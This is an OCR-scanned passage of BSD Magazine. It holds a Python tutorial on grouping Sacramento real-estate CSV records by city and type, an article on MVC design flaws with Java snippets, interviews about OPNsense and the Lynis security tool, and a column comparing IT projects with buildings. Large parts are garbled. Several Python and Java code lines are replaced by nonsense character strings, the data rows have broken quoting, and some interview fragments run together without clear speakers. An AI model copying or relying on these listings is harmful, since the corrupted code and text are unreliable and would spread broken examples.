reader = csv.reader(f, delimiter=',', dialect='excel') 
for line in reader: 


data.append (line) 
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FO 210 OS eno OO Sooo S 0 ee eee leon) lee eS Oeste 
RIVER DR Unit 114', "RANCHO CORDOVA', '95670', 'CA', '2', '2', '941', 
WiGroinvolor: A.” MiNSre AM iyo ONO CUO) SONOS cRID ML ONL oy. IU Oars. Meralco iki ono 
ei OSs so) in 


Now that we have the data in a list, we can process it any way we like. Let's move on to the next 
section so that we can manipulate each row and gather some data from it. 


Manipulate and gather metrics on each sentence 


lf you had the curiosity to observe the file contents before processing it, you found that in the file 
header we have the column names of the file data: 


SINS SNE OULIE NP chop ses oS Sls 7 loele ds 7iSie[s Iie 5 eile Sel IS eee Ole LiGio 7 ele ale biel 


Now, let's separate the transactions by city and by type so that we can find out how many real es- 


tate properties of each type exist in each city. 


Python 


lf we think about it for a bit, we have to separate the data by city and, for each one, separate the 
data by type: 


example = { 
onlin a Missa 3 
MIEN ie JEG SE. SIONS tee lupe “Oe ie EZ | OI COSI Ey S|) y 
WIENICIS aa evel siueic NANOS. Neie@lsioiein (4/245: NolsOjere et || 4 
by 
GEN Vase 


MIE ACIS AILS? SI ONeeNS Ne IE W/O)” IOICTO SNe Iw Vk fp Oe Oee 1/1)" 


This is an example of a data structure that can handle our data, you can think of other ways to 
store the data, as long as you can get the statistical data requested above. 


S50 let's see how can we process the data in order to generate this structure: 


>>> processed = {} 
Sw O12 2 16O) 1) (ain Ake eel 
Gale, row[1l] 
type row|/| 
IL IES Ona Ce ssiae A lave) Vice ya (es Bye 
Sue Wes Vv Oiclere Ses (erel euLiey| 
One AE ere joue eae SGere ees) 
[Nes TOA Sw elojosiuel (eemy, 


processed[city] [type] cee Pe 


Python 


elece 


processed[city] = {type: [row] } 


>>> processed[ ‘ANTELOPE’ | 


{'Residential': [['3828 BLACKFOOT WAY', 'ANTELOPE', '95843', 'CA', 
eyed ae AIO eo me une vsabele@hesbor baad Oc iievel SMbsinvs bez Tes COLOR ONOhGC 00) SIDE S7210lOlcn 
'126640', '38.70974', '-121.37377'], ['5708 RIDGEPOINT DR', 'ANTE- 

WO Pe Ose oe Cee er ne eRe Sree metal) Wec Way al 
CROPOMG ONO! I IDEReZOGretinrs “NIE GHLe ohare “LcremaivaCreyaure “yeeros eronunioe Mikwe voce 
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'-121.387698'], ['5308 MARBURY WAY", ‘ANTELOPE’, '95843', 'CA’, '3', '2', '1830', ‘Residen- 
tial’, ‘Mon May 19 00:00:00 EDT 2008’, '254172', '38.710221', '-121.341707'], ['4712 PISMO 
BEACH DR’, ‘ANTELOPE’, '95843"', 'CA’, ‘5’, '3', '2346', ‘Residential’, ‘Mon May 19 00:00:00 
EDT 2008’, '320000', '38.707705', '-121.354153'], ['4741 PACIFIC PARK DR’, ‘ANTELOPE’, 
'95843', 'CA’, '5', '3', '2347', ‘Residential’, ‘Mon May 19 00:00:00 EDT 2008’, '325000', 
'38./709299', '-121.353056'], ['3361 ALDER CANYON WAY", ‘ANTELOPE’, '95843', 'CA’, '4', '3', 
‘2085’, ‘Residential’, ‘Mon May 19 00:00:00 EDT 2008’, '408431', '38.727649', '-121.385656'], 
[3536 SUN MAIDEN WAY", ‘ANTELOPE’, '95843', ‘CA’, '3', '2', '1711', ‘Residential’, ‘Fri May 

16 00:00:00 EDT 2008’, '161500', '38.70968', '-121.382328'], ['4008 GREY LIVERY WAY’, 'AN- 
TELOPE’, '95843', 'CA’, '3', '2', 


'1669', ‘Residential’, ‘Fri May 16 00:00:00 EDT 2008’, '168750', '38.71846', '-121.370862'], 
[8716 LONGSPUR WAY", ‘ANTELOPE’, '95843', 'CA’, '3', '2', '1479', ‘Residential’, ‘Fri May 16 
00:00:00 EDT 2008’, '205000'," '38.724083', '-121.3584'], ["7901 GAZELLE TRAIL WAY", 'AN- 
TELOPE’, '95843', 'CA’, '4', '2', '1953', ‘Residential’, ‘Fri May 16 00:00:00 EDT 2008’, '207744', 
'38.71174', '-121.342675'], [4085 COUNTRY DR’, ‘ANTELOPE’, '95843', 'CA’, '4', '3', '1915', 
‘Residential’, ‘Fri May 16 00:00:00 EDT 2008’, ‘240000’, °38.706209', '-121.369509'], ['8316 
NORTHAM DR’, ‘ANTELOPE’, '95843', 'CA’, '3', '2', '1235', ‘Residential’, ‘Fri May 16 00:00:00 
EDT 2008’, '246544', '38.720767", '-121.376678', ['4240 WINJE DR’, ‘ANTELOPE’, '95843', 
'CA’, ‘4°, '2', 2504", 


'234000'", '38.727657", '-121.391028'], [3305 RIO ROCA CT’, ‘ANTELOPE’, '95843', 'CA’, '4', 
'3', 2652’, ‘Residential’, ‘Mon May 19 00:00:00 EDT 2008’, '239700', '38.725079', 


‘Residential’, ‘Fri May 16 00:00:00 EDT 2008’, ‘246750’, '38.70884', '-121.359559'], ['4636 
TEAL BAY CT”, ‘ANTELOPE’, '95843', 'CA’, '4', '2', '2160', ‘Residential’, ‘Fri May 16 00:00:00 
EDT 2008’, '290000'”, '38.704554', '-121.354753'], ['7921 DOE TRAIL WAY’, ‘ANTELOPE’, 
'95843', 'CA’, '5', '3', '3134', ‘Residential’, ‘Fri May 16 00:00:00 EDT 2008’, '315000', 
'38.711927', '-121.343608'], ['4509 WINJE DR’, ‘ANTELOPE’, '95843', 'CA’, '3', '2', '2960', 
‘Residential’, ‘Fri May 16 00:00:00 EDT 2008’, '350000', °38.709513', '-121.359357'], ['3604 
KODIAK WAY", ‘ANTELOPE’, '95843', 'CA’, '3', '2', ‘1206’, ‘Residential’, ‘Thu May 15 00:00:00 
EDT 2008’, '142000', '38.706175', '-121.379776'], [8636 LONGSPUR WAY’, ‘ANTELOPE’, 
‘95843’, 'CA’, '3', '2', '1670', ‘Residential’, ‘Thu May 15 00:00:00 EDT 2008’, '157296', 
'38.725873', '-121.35856'], [8428 MISTY PASS WAY’, ‘ANTELOPE’, '95843', 'CA’, '3', '2', 
‘1517, ‘Residential’, ‘Thu May 15 00:00:00 EDT 2008’, ‘212000’, '38.722959', '-121.347115']], 
‘Condo: [['8020 WALERGA RD", ‘ANTELOPE’, '95843', 'CA’, ‘2’, '2', '836', ‘Condo’, ‘Mon May 
19 00:00:00 EDT 2008’, '115000', '38.71607’", '-121.364468']]} 


BSD 


Now we have the data in the format that we want, but it is still not very readable. Let's make a 
function to pretty print the data in a more human way: 


Now, let's try it and see some sample output: 


Dee. OIESNE ONY. 7 Oe LIGNE, NClel evel One cherchsisioiel) 
Calienvss ORANGEVALE 
Type: Residential - 11 
City: CITRUS HEIGHTS 
Type: Residential - 32 
ib Wacreres 1Qroiaiolon- a2 
Type: Multi-Family - 1 
Cabiey ee. SS ENCE MIEIN IES 
Type: Residential - 402 
Type: Condo - 2/7 


Type: Multi-Family - 10 
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Output a file with the metrics obtained 


We now have the statistical data. But what can we do with it? Let's save it in a file, using the 
JSON format, so that it can be passed to other applications: 


>>> import json 
>>> with open('statistics.json', 'wb') as f: 


JPSClse, Cleiieiels —" BS Cla eluumels | Ceo Saisie!) 


iB ouile Were) Cy sskouglieleliowey) 


And that’s it! Try to read the data from the newly created JSON file, so that you get the hang of 
it... 


My name is Rui Silva and I'm a Python developer who loves open source. | started working as a 
freelancer in 2008, while | finished my graduation in Computer Science in Universidade do { 
Minho. After my graduation, | started pursuing a master's degree, choosing the field of parallel 
computation and mobile and ubiquitous computing. | ended up only finishing the mobile and ubig- 1 
uitous computing course. In my 3 years of freelancing, | worked mostly with python, developing § 
django websites, drupal websites and some magento stores. | also had to do some system ad- i 
ministration. After that, | started working in Eurotux Informatica, S.A. where | develop websites : 
using Plone, django and drupal. I'm also an IOS developer and sometimes | perform some sys- i 
tem administration tasks. Besides my job, | work as a freelancer using mainly django and other } 
python frameworks. 1 
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Model View Whatever - MVC’s 


by Damian Czernous 


The structure of the MVC is quite complex. Every part of M, 
V and C relates mutually to each other and every associa- 
tion has a well defined purpose. 


Design flaws and misuse 


The original structure of the MVC has the Model and the View related flaws. Historically, engi- 
neers address the Model related flaws first. In late 80’s, Forms and Controls (the term coined by 
Martin Fowler) way of designing UI interfaces lays the foundation for the next generation pattern 
Model-View-Presenter (MVP). Later on, engineers concentrate on the View related flaws. Each 
flaw and its solution is a step forward on the MVC evolution path. 


Coders around the world understand the pattern differently. From my 
observations, there are two reasons. First, engineers more frequently 
code rather than read and code. The result is that their own assump- 
tions replace learning. Even when engineers read first, some still miss 
sinter the proper usage because of mentioned design flaws which show the 
real power in the company of the bad design decisions. Second, be- 
cause of people who write papers about the pattern. It is difficult to 
find a distinctive group of authors who share the same understanding. 


1? find 


1 3 selectRow 
J 


Each misuse reveals the design complexity. Every next generation UI 
pattern has a simpler structure compared to its predecessor. Maybe 
that is why the MVP and the MVVM arouse less excitement. 


1 4 tindNewest 


Model side flaws 
1.5 getNewestt ofor 


As mentioned in the last paper, ,Model View Whatever — origins”, in 
earlier versions of the Smalltalk language, graphical user interfaces 
were not common. The original MVC assumes we are manipulating 
Smalltalk objects rather than application domain objects. 


Figure 2: Accessing widget 
styles in MVC 


BSD 


MAGAZINE 


235 


GUI 


his is an important observation since engineers using MVC want to use Model as a Domain 
Model which, by the way, is the right understanding of the general thought behind the pattern. 


However, the design of the pattern doesn't seem to be ready to face the consequences of that 
thinking. 


Flaw: Widgets stylings are stored in Model 


public class ProductTable extends Table implements ProductsObserver 
private ProductGateway productGateway; 


@Override 
public void announceChange () 
{ 
fillTable( productGateway.find() ); 


selectRow( productGateway.findNewest(), 
(Die OCC IGE iCSwel oo ClS HCO LenaCuE Niowies El) ee 


} 


[ove AVENE < AWK TCL Aba bev ok (| Ceicorcliareicis Jeciocuier es) Y)) 4] 


(eiIWetS Woe pe LeciciNcny | Ole: memwiicl, Colom Moller iu) 


This example assumes presence of some widget framework. The original MVC, however, was 
used to build Smalltalk widgets. But the essence of the problem remains untouched: the widget 
styles are not a part of the application domain represented by the ProductGateway class. Product 
might have id, name, price, creation date and other attributes. These attributes define product, 
but color of the latest available product does not. 
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Flaw: Widgets states and application states are stored in Model 


L.l:setSelectedProduct 


1.2 showEditor 
1.2. lL getSelectedProduct 


1.2.2 display 


Figure 3: Accessing widget states in MVC 


SULodlive: leis Ss) (igecliic eliellieve cave gy * imeilLemeqics' 
ItemClickEvent.ItemClickListener 


private ProductGateway productGateway; 


private ProductOverviewController productOverviewController; 


@Override 
OionkiNS: svonkel shes Manele” Meee vel yee, vencSiaiie:, |) 
{ 
productGateway.setselectedProduct( () -> event.getItemld () 


[oie CICHOS OCHS en Crm TsO) leva Ais VON CLI EONe (ho 
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public class ProductOverviewController 


{ 


private ProductGateway productGateway; 


MILA SLIEE? PICOCMUCNE Clee WaLenys Joel ElaelaL icone Va eiie 


jbo Lave? Aye@anels JSinkeyndelbicionenG) 


{ 


joia@rehiie ie larelukwere Valve weliulsielke vel 
productGateway.getsSelectedProduct() ); 


} 


In MVC communication between view and controller should be done through model. Although, di- 
rect communication is possible e.g. controller may still disable or enable some widgets in re- 
sponse to model change. However, if communication can be done through model than this is pre- 


ferred way. Such strategy reduces complexity between view and 
[ProducrTabe] [PreavetOvervienScreen] [ProductGatewa] : ” : 


controller. 


eee In the example above, product edit action (view part) responsible 
= for handling editing request stores selected product in the Product- 
Gateway object (model), so the controller may pass request to the 
— saiaes editor's view. The problem is that selected product does not de- 

| ~ o scribe application domain (does not belong to it). 


1.3 selectRow It is worth to mention that normally MVCs (product overview and 
| editor) should not know each other directly. One solution might be 
LA fingrvemest to Invert Dependencies other to use Publish-subscribe pattern. 


1.4.1 *edNewest 
| Solution means evolution 


1S gethewessC olor That problem is also Known to the early smalltalkers who simply 
------ introduce another model called Screen Model (aka Presentation 
Model). This additional model keeps all screen stylings and 


Figure 4: Accessing widget styles in states. It also mediates calls to the Domain Model. 
MVC via Presentation Mode! i. S D 
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public class ProductTable extends Table 


implements ProductsObserver 
private ProductOverviewScreen productOverviewsScreen; 


@Override 
public void announceChange () 
{ 
1S AL JEL OduSt | Siaere ble ei OhenenalieitiSie ceisin Ban aliguel i 3) 


selectRow( productOverviewScreen.findNewest(), 
DIC ORINC TOMS OV ESS CisSeS i ate Colle cO memes et) 18 


} 


jQuealWrelwer Av@ukel mes ibelolken( dgicecibiee/s. joimecibiemc: yy “ia; 
Sie asOs: Waele aioulacveneionm (leaicreie: seenmduelk. Wrellene xelollione: | 
j 


joo lave: YollerSsy Je cretion debe Neheavenat “ak qo leigierenes 
ItemClickEvent.ItemClickListener 


private ProductOverviewScreen productOverviewsScreen; 


private ProductOverviewController productOverviewController; 


CON TeTE LEE 


jeiollave® syfonuel abies ihavel<( dhesle lave) <a rine: eneianee » 
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productOverviewscreen.setSelectedProduct( () -> 
event.getItemlId() ); 


(Die ONC O Wis Ava Conm ere I Siesss Monmpaycli cone (1h 


public class ProductOverviewController 


{ 
private ProductOverviewScreen productOverviewsScreen; 


OIL SNES* Pic oChuiOe CLC Ole VILE) Joe OCMC ILE Cline Ver 


jorUllonbarick *Wwreavek-siaveinid chino tG) 


{ 


productEditorView.display ( 
productOverviewscreen.getSelectedProduct() ); 


This interesting solution allows to use MVC in a wider context. Originally MVC targets design of 
the Smalltalk widgets. Now, it is possible to treat view as a whole screen keeping Separation of 
Concerns (SoC) principle inviolated on the model side. Also controller has more work to do since 
has to control behaviour of the own (view) widgets. Maybe this is why controllers are more fea- 
tured in applications that use widget frameworks than in widget frameworks itself where presenta- 
tion part is often modelled as a single class. 
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In next paper 


The Presentation Model lays foundation for Application Model developed by ParcPlace Smalltalk 
(VisualWorks). Application Model not only keeps screen states and stylings but also can update 
widgets directly. This, in turn, forms the basis for future Model View Presenter (MVP) and Model 
View ViewModel (MVVM) design patterns. 


The preference of understanding view as a screen (Forms and Controls) becomes stronger in 
late 80's. Next paper, Model View Whatever - Forms and Controls influence, contrasts MVC with 
upcoming reality and moves on to the MVP evolution. 


es — SS a ee ee ee eee 
a — Ss =< Se = * 
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INTERVIEW 


Sharing Knowledge Creates Better 
Products 


Jos Shellevis from OPNsense 


by Marta Ziemianowicz & Marta Strzelec 


[BSD Magazine]: Hi Jos, please tell us about BSD, what it is, why and why is it free (or soft- 
ware built on it is usually free of charge)? 


[Jos Shellevis]: BSD is an operating system that finds its origin in Unix and was originally devel- 
oped by the Berkeley University in California. There are many different flavors of BSD currently 
available, ranging from FreeBSD to Apple’s OS X. 


| think the success of BSD largely comes from its simple license and the commitment for open 
source software. 


The idea that software built with, or on top of, BSD is usually free and open source, is incorrect as 
the BSD license allows for commercial non open source applications. 


For our community project, we opted for FreeBSD as it offers the functionality we need combined 
with great driver support. Furthermore, we work the HardenedBSD project to incorporate their se- 
curity enhancements on top of FreeBSD into OPNsense. 


[BSD Mag]: What is OPNsense project? Who should join and why? 


[JS]: OPNsense is an open source, easy-to-use and easy-to-build FreeBSD based firewall and 
routing platform. The project is open for everyone to use or help with the development. 


The feature set of OPNsense includes high-end features, such as forward caching proxy, traffic 
shaping, intrusion detection and easy OpenVPN client setup. 


OPNsense’s focus on security brings unique features, such as the options to use LibreSSL in- 
stead of OpenSSL (selectable in the GUI) and a custom version based on HardenedBSD. 


BSD 


So, essentially, anyone looking for a firewall should try OPNsense. 
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[BSD Mag]: Why is building a community and supporting each other so important in this 
industry? 


[JS]: Sharing knowledge creates better products: that is the core tenet of open source and it is 
the primary driver for our success over the past 15+ years with Deciso B.V., the founder of OPN- 
sense. 


With all the security threats there are nowadays, customers demand open and verifiable sources 
to ensure the software doesn't suffer from backdoors. 


In the past, customers decided in favor of open source for its lower cost and to prevent vendor 
lock-in. | believe that perceived security and fear of spying governments will contribute to the 
growing success of open source business models. 


[BSD Mag]: Do you think that the community is a big factor in FreeBSD’s popularity? Or is 
it just about functionality? 


[JS]: That is a definitive yes! The community is driving the success and development of FreeBSD. 


[BSD Mag]: You have a mission statement: “Give users, developers and businesses a 
friendly, stable and transparent environment. Make OPNsense the most widely used open 
source security platform.” Is there is any philosophy or core values that drive you while 
doing business? 


[JS]: OPNsense is a community project that is funded by a Deciso and a group of mainly Euro- 
pean companies who share the understanding that open source makes for better products. 


What makes the project unique amongst its peers is the focus on code quality and the modern de- 
velopment approach with the use of a MVC (model view control) framework and a bootstrap 
based user interface. 


The development process with two major releases each year and incremental updates, that are 
delivered with a simple integrated upgrade mechanism, offers the reliable environment that is re- 
quired to do business. 


[BSD Mag]: You are based in The Netherlands. Do you think there is any difficulty behind 
that? Does the market differ from American one? 


[JS]: | think open source projects can thrive anywhere in the world, but it certainly helps to have 
a stable government. 


The Netherlands is one of the oldest democracies in the world and one of the founders of the 
European Union. | believe it is an ideal place for hosting our community project just as many 
multi-nationals found it most suited to have their European headquarters located 
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As for open source, | believe the European market does not differ much from the American one. 
[BSD Mag]: What do you think about recent cyber crimes? Do they interest BSD people? 


[JS]: | think people should be aware of the daily threats that they are exposed to and be more 
careful. Just common sense can keep you from a lot of trouble; such as don't install any free app 
if you dont know the origin of it and allow it to gain access to every part of your mobile phone. 


| think the awareness for security risks is certainly high amongst BSD users and developers, so 
I'd say yes we are interested in cyber crimes and ways to prevent intrusions. 


[BSD Mag]: What about the other side - do you think that the cyber security community is 
aware of BSD and the possibilities it offers in their field? 


[JS]: Yes | do, but if not, then this is a great opportunity to get to know BSD and test OPNsense 
features like the newly designed inline intrusion prevention mechanism based on Suricata. 


[BSD Mag]: What are the biggest challenges your company has been facing recently? 


[JS]: | think many companies have felt the effects of the credit crunch and so did we, back in 
2009. 


The more recent creation of the OPNsense community took a lot of effort; creating a functional 
open source community is difficult and sometimes seems to conflict with business interests. But 
our determination to make it work has already led to a large and thriving community. 


[BSD Mag]: Is it difficult to run a profitable business in an environment that strongly pro- 
motes sharing? 


[JS]: Running a business comes with challenges but we strongly believe that sharing makes for 
better products and our customers appreciate that. 


[BSD Mag]: What are your plans for the future? 


[JS]: | would say: watch us closely as our goal is making OPNsense the most widely used open 
source security platform. 


[BSD Mag]: Well, we wish you good luck! Finally, is there is anything you would like to 
share with our readers? 


[JS]: Most definitely YES! If you feel open source security is important and makes sense then try 
OPNsense and be part of the community. You are invited. 


So that provides easy access to knowledge. Then there are several communities around open 
source, including user groups and nowadays Meetups. 
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Our country is known for their trading skills during the last centuries, and we might have inherited 
that way of thinking. We are actually “cheap”. So instead of paying for a Windows license, we 
dont mind having to tinker a bit, and get a system with a cheaper alternative. | also see this in 
countries like Belgium, France, Spain, and Germany. They also have a high amount of open 
source usage. There is only a small difference between all these countries and ours, which is that 
we usually use English (instead of Dutch) as our primary language when sharing knowledge and 
building projects. 


[BSD Mag]: Do you think European market differs a lot from American one? Would it be 
better for you to be based in USA? And do you think that Europe has to face a different cy- 
ber attack, or it’s basically the same as USA? 


[MB]: There is definitely a big difference in both markets. For example, compliance is something 
which drives American companies more than in in Europe. The way money is spent is different as 
well. Americans usually quickly understand the value of a product and then decide to pay for it, 
while European people want to discuss and compare things. When it comes to attacks, the 
stakes might be similar. Every country has critical infrastructure and companies doing interna- 
tional business. An interesting fact is that individual systems in The Netherlands are an interest- 
ing target, due to our good connectivity. When it comes to our location, The Netherlands is actu- 
ally a very good place to be. There is a lot going on with information security during the last 
years. The Hague Security Delta, as an example, which means the government, companies, and 
universities, are now working together and creating their own ecosystem. This way we can get 
more students trained and deployed in our field. For us The Netherlands is a good place to be, as 
we have a lot of skilled people in the area. From here we can continue providing our services, 
while at the same time being close to new developments. 


[BSD Mag]: Is there a difference in response to attacks as well? 


[MB]: | don't think there is a lot of differences on how each country respond to attacks. In the end 
this is depending on regulations, but more importantly on the affected company itself. 


[BSD Mag]: OpenBSD has its own amazing community. Do you think Linux/Unix enthusi- 
asts create such community as well? 


[MB]: There are definitely such communities as well in the Linux space. The difference is that they 
have more specific interests, like a specific Linux distribution. One great example is that even sys- 
temd has its own conference (systemd.conf). 


[BSD Mag]: What are the current trends you're seeing in cybercrime? 


[MB]: Last year's “ransomware’ is becoming a hot topic. The attacker will encrypt all your files. 
Then money is asked in exchange for decrypting your data back to its original form. It now is also 
available for Linux systems and my guess Is that it won't take long that it becomes 
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becomes more popular. In 2003 when | created rkhunter, the use of rootkits was commonly seen. 
While it has been silent around that topic for some years, sometimes new ones are showing up 
again. After all, sometimes attackers want to maintain control as long as possible over hijacked 
machines. 


[BSD Mag]: What are your biggest challenges today and how are you working to solve 
them? 


[MB]: One of the challenges we face is actually how people perceive security tools. Often people 
compare Lynis as a vulnerability scanning tool. There is a fine line between performing a security 
audit, and searching for known issues. While our solution also may pick up weaknesses, its pri- 
mary goal is different. We help to measure your defenses and propose the implementation of new 
ones. Or when applicable, enhancing existing implementations. This is different to searching for 
known vulnerabilities and then telling you to fix them. We try to solve this issue by educating peo- 
ple, during presentations and by writing about the subject. 


[BSD Mag]: What are the company’s plans for the future? 


[MB]:Currently, we have a high focus on compliance and automation. For example, companies 
who process payment transactions are required to be in compliance with PCI DSS. The specific 
details in the standard change on a regular basis, which is challenging for most companies. So 
that is something we focus on, to make this process easier for them. Then when the auditor 
comes in, the number of findings will be very small, simplifying the certification process. Another 
thing is automation and something we will further improve upon, like introducing the API (Applica- 
tion Programming Interface) we are working on. This enables customers to compare systems 
from their CMDB (Configuration Management Database) with the ones discovered during the se- 
curity scans. A great way to discover so-called “shadow IT”, like systems running under desks. Af- 
ter this work is done, we have actually some plans to make things more real-time, like detecting 
changes to the system when they happen, and properly reporting on it. 


[BSD Mag]: Is there is anything you would like to tell/advise our readers? 


[MB]: There are definitely some things | wish | knew when | started in the information security 
field. They might seem like basic tips, but it is easy to get trapped into other beliefs. Especially 
with security vendors and security researchers throwing all kind of threats and risks at us. 
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About OPNsense 
OPNsense is an open source, easy-to-use and easy-to-build FreeBSD based firewall 
and routing platform. 


The project is founded by Deciso. 


More information about 
OPNsense: opnsense.org 
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Follow on twitter: @opnsense 
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L- SQ. About Deciso 
nai © SO Deciso B.V. is a globally operating 


manufacturer of networking equip- 

YY KO VS ment. The company designs and pro- 

duces complete products for integra- 

tors, OEMs and resellers. Deciso believes in the power of open source and ac- 

tively contributes to the open source community. The company was founded in 
2000 and Is located in Middelharnis, the Netherlands. 


For more information about Deciso, see: www.deciso.com 
Follow on twitter: @deciso_ tweets 


Deciso's OPNsense A110 rack appliance, made in the Netherlands 
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About Jos Schellevis 


Jos Schellevis is a creative thinker, member of OPNsense community project core 
team and Chief Technology Officer at Deciso B.V. 


He graduated at Rotterdam University of Applied Technology and has over 15 years 
experience in networking and telecommunications. 


Follow on twitter: @jschellevis 
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Rob’s COLUMN 


Many years ago, a colleague lamented that “Computers are 
never like cars — reliable and consistent’. A classic book 
by Stewart Brand — How Buildings Learn — argues that if al- 
lowed to, human artifacts, like buildings, can and do 
evolve. So what, if anything, can the IT technology industry 
learn from this ancient trade? 


by Rob Somerville 


At first glance, comparing IT systems and the 
building sector would seem a pretty pointless 
exercise. Both industries are based on engi- 
neering, a system of standards and a com- 
mon expectation of a usable interface and 
functionality. Where the disparity lies, how- 
ever, is the way these disciplines are exe- 
cuted during development and the longer term 
longevity of the project. Many modern build- 
ings are constructed in a matter of months, 
some IT systems take years. Few IT systems 
have a lifespan over 25 years, yet most build- 
ings last at least 70 years, unless they are of 
temporary construction. The major difference 
between the sectors, though is not just con- 
fined to the development phase, but also how 
the final product interfaces with the end user 
and the environment. Apart from differences 
exhibited in hot / cold tap positions, the design 


of toilets and mains power sockets, most build- 


ings throughout the world are identical with 


the exception of these geographical and na- 
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tional differences. Doors have handles, win- 
dows open and cupboards store ancillary 
items. Floors are for standing on, and ceilings 
are, more often than not, designed to hide the 
ugliness of rafters, pipework and other parts 
of the structural skeleton. The sheer variety of 
user interface in the technology world is not 
just contained by subtle differences, such as 
LED versus LCD versus Nixie tube, but in a 
multitude of operating systems, consoles and 
control devices, from keyboard to touch- 
screen and the rest. 


The development phase is also riddled with 
contrast; whereas few building engineers 
would even think of starting a building without 
an exacting and final signed off specification, 
many IT projects are cursed with project 
creep, changes in spec and final customer dis- 
satisfaction. 
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Despite layers of project management, rarely 
do major IT projects succeed (e.g. on time, on 
budget and does what Is said on the tin), espe- 
clally in the Government sector, which is espe- 
cially ironic aS one would expect all the at- 
tached bureaucracy and management to coun- 
teract any vagrancy in professional discipline 
or standards. There is also a very subtle eco- 
nomic difference between the two sectors 
which the author believes is the cornerstone 
of why there is such a gulf of disparity be- 
tween technology and the more permanent 
concrete or brick building over time; perceived 
and market value. 


Whereas a developer will leave a newly cre- 
ated structure at least at break even, he or 
she would be working in extremely adverse 
economic conditions if they were to make a 
loss, especially if the value of the property 
was taken over time. Rarely do the prices of 
property fall, unless some major catastrophe 
hits the global financial sector. So a devel- 
oper's worst nightmare is building in a falling 
market, but generally, the opposite is the 
case. When you have a sweetheart deal 
where the developer takes a percentage of 
profits over the lifetime of a building or is sub- 
sidised by the government (e.g. house build- 
ing / purchase schemes), they cannot lose. Ir- 
respective of this, the market value of the 
building will at least Keep pace with inflation 
over time, if not exceed it. Part of this anchor 
to value will be land prices, but also the esca- 
lating price of labour and materials. In the 
1970's, a three bedroom detached house just 
outside London would cost less than £5K. To- 
day, you would be fortunate to purchase a 
similar property for E500K. A commercial IT 
system of the era could cost £E25K (£2.5 mil- 
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lion using the same scale in today's money), 
yet will be in some landfill somewhere and 
cost considerably less to implement today. 


The irony, paradox and contrast could not be 
more obvious. A product that we all need at 
the very core of civilisation is valued on an ex- 
ponential curve over time, only demolished 
every few generations, and evolves and im- 
proves as Is required — often out of love and 
commitment. Technology on the other hand, 
an amalgam of single point of failures, without 
which the building probably could not maintain 
value, is disposable, continually re- 
engineered, but most tragically of all, consid- 
ered passe unless, of course, it is exhibited in 
its most cutting edge and unstable forms. Or 
to put it another way, the words technology 
and antique will rarely be found in the same 
sentence unless, of course, it is on derogatory 
terms. 


What is missing of course is the application of 
the four 'C' words — craftsmanship, cartel, cul- 
ture and capitalism. While IT and systems 
have embedded themselves to a greater or 
lesser degree in the latter three camps, crafts- 
manship has all but been squeezed out by the 
economic equation. While creativity abounds 
in the industry, this is often transitory, and few 
ground shaking developments drill down to 
the very depths of the sector. WIMP, Win- 
dows, Icons, Mouse and Pointers, probably is 
the most memorable, being the single most 
prominent innovation out of Xerox PARC to 
bring democratisation to computing outside of 
the Internet revolution. Of course, cloud advo- 
cates would deny this, but that particular 
wheel was already available in the mainframe 
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The transitory nature of IT, by its very defini- 
tion, is the opposite of bricks and mortar. Try- 
ing to force this engineering discipline into the 
same cadre as builders, architects, plumbers 
and DIY enthusiasts would at first glance ap- 
pear madness, but if we are to bring some- 
thing permanent to the history books other 
than constant change, as an industry, we 
need to examine not only where we are going, 
but also where we came from. 


And the cloud folks have got it right in this re- 
spect to some degree, at least — redundancy, 
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reliability and scale. To make a big impact on 
history, you have to think big. Parthenon or 
pyramid big. The question is, are the founda- 
tions sufficiently robust to take the test of 
time’? 


In my next column, | will look at the major simi- 
larities and disparities between the building 

and IT sectors when it comes to development, 

risk and the end product. Have a great Christ- 
mas and an even better New Year. 
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